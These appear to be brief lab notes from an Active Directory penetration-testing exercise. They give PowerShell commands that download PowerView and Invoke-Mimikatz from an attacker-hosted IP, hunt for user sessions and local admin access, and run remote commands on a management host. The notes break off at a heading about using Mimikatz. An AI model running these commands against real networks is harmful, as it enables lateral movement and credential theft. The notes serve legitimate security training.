We are now

Download PowerView

powershell iwr <http://172.16.100.48/PowerView.ps1> -outfile C:\\Temp\\PowerView.ps1

User-Hunter

Invoke-UserHunter

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/7d6eab69-5eed-4944-8836-979aec3b049c/Untitled.png

Verify If We Have Local Admin Access To Dcorp

Invoke-UserHunter -CheckAccess

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/2ade8cf9-ff4e-4272-988e-6a109fa4ee68/Untitled.png

Executing Commands On dcorp-mgmt

Invoke-Command -ScriptBlock {whoami;hostname;ipconfig} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Downloading Mimikatz

powershell iwr <http://172.16.100.48/Invoke-Mimikatz.ps1> -outfile c:\\temp\\Invoke-Mimikatz.ps1

Using Mimikatz on Other PC